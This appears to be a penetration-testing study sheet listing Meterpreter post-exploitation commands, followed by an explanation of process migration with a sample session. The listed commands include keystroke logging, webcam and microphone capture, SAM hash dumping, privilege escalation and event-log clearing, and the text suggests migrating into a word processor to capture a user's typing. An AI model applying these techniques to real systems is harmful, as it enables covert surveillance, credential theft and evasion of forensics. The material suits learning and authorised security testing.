## Top Commands **Meterpreter Commands** ```Terminal sessions -u NUMBER ---> Turn Shell into Meterpreter session run ---> Executes a Meterpreter script or Post module sessions ---> Quickly switch to another session migrate ---> Allows you to migrate Meterpreter to another process background ---> Backgrounds the current session exit ---> Terminate the Meterpreter session help ---> Displays the help menu info ---> Displays information about a Post module irb ---> Opens an interactive Ruby shell on the current session load ---> Loads one or more Meterpreter extensions #Networking commands arp ---> Displays the host ARP (Address Resolution Protocol) cache ifconfig ---> Displays network interfaces available on the target system netstat ---> Displays the network connections portfwd ---> Forwards a local port to a remote service route ---> Allows you to view and modify the routing table resolve X_Y ---> Check DNS of local network to find a host IP #System commands clearev ---> Clears the event logs execute ---> Executes a command getpid ---> Shows the current process identifier getuid ---> Shows the user that Meterpreter is running as kill ---> Terminates a process pkill ---> Terminates processes by name ps ---> Lists running processes reboot ---> Reboots the remote computer shell ---> Drops into a system command shell shutdown ---> Shuts down the remote computer sysinfo ---> Gets information about the remote system, such as OS #Others Commands (Listed under different menu categories in the help section) idletime ---> Returns the number of seconds the remote user has been idle keyscan_dump ---> Dumps the keystroke buffer keyscan_start ---> Starts capturing keystrokes keyscan_stop ---> Stops capturing keystrokes screenshare ---> Allows you to watch the remote user's desktop in real time screenshot ---> Grabs a screenshot of the interactive desktop record_mic ---> Records audio from the default microphone for X seconds webcam_chat ---> Starts a video chat webcam_list ---> Lists webcams webcam_snap ---> Takes a snapshot from the specified webcam webcam_stream ---> Plays a video stream from the specified webcam getsystem ---> Attempts to elevate your privilege to that of local system hashdump ---> Dumps the contents of the SAM database ``` - Meterpreter Migration Shell Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the `keyscan_start`, `keyscan_stop`, and `keyscan_dump` command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session. If you migrate in process id of browser, it might even be possible to inject elements in the web page. To migrate the session, you can use the `migrate` command and specify the PID of the target process. For example, if you wanted to migrate the session to the process with PID 1234, you would use the following command: The migrate command ```shell-session - meterpreter > migrate 1234 [*] Migrating from 1304 to 1234... [*] Migration completed successfully. meterpreter > ``` When you migrate the session to a different process, the payload is injected into the target process and begins executing within its context. This means that the payload is now running within the same process as the target process, and has the same privileges and access to resources as the target process. We can think about this has both PID that fuse together! Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.